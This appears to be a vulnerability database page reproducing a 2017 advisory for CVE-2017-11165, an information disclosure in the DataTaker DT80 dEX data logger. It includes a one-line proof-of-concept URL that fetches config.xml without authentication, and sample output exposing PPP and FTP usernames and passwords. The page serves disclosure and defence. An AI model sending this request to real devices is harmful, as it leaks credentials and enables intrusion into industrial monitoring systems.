Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtNassim Asrir1337DAY-ID-28118
HistoryJul 12, 2017 - 12:00 a.m.

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure Vulnerability

2017-07-1200:00:00
Nassim Asrir
0day.today
39

0.943 High

EPSS

Percentile

99.2%

JSON

DataTaker DT80 dEX version 1.50.012 suffers from an information disclosure vulnerability.

[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: [emailΒ protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-11165
 
Vendor:
===============
 
http://www.datataker.com/
  
  
About:
========

The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display.

The dataTaker DT80as Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution.  
  
Vulnerability Type:
===================
 
Sensitive Configurations Exposure.
 
 
issue:
===================
 
dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via
a direct request for the /services/getFile.cmd?userfile=config.xml URI.
  
POC:
===================

http://victim/services/getFile.cmd?userfile=config.xml


Output:
========

<config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0">
<environment>
<application version="1.50.012" build="2014-01-07, 15:16:53"/>
<flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/>
<operatingSystem version="Windows 7"/><firmware version="9.14.5407"/>
<screen resolution="1024x768"/>
</environment>

etc....

<loggerSetting category="PPP" profile="USER">username</loggerSetting>

<loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting>

#  0day.today [2018-01-09]  #

Related

packetstorm 1
exploitpack 1
cvelist 1
nvd 1
nuclei 1
prion 1
cve 1
exploitdb 1
packetstorm
packetstorm
DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure
2017-07-12 00:00:00
exploitpack
exploitpack
DataTaker DT80 dEX 1.50.012 - Information Disclosure
2017-07-11 00:00:00
cvelist
cvelist
CVE-2017-11165
2017-07-12 12:00:00
nvd
nvd
CVE-2017-11165
2017-07-12 12:29:00
nuclei
nuclei
DataTaker DT80 dEX 1.50.012 - Information Disclosure
2023-01-15 12:41:22
prion
prion
Information disclosure
2017-07-12 12:29:00
cve
cve
CVE-2017-11165
2017-07-12 12:29:00
exploitdb
exploitdb
DataTaker DT80 dEX 1.50.012 - Information Disclosure
2017-07-11 00:00:00

0.943 High

EPSS

Percentile

99.2%

JSON
Related for 1337DAY-ID-28118
packetstorm1exploitpack1cvelist1nvd1nuclei1prion1cve1exploitdb1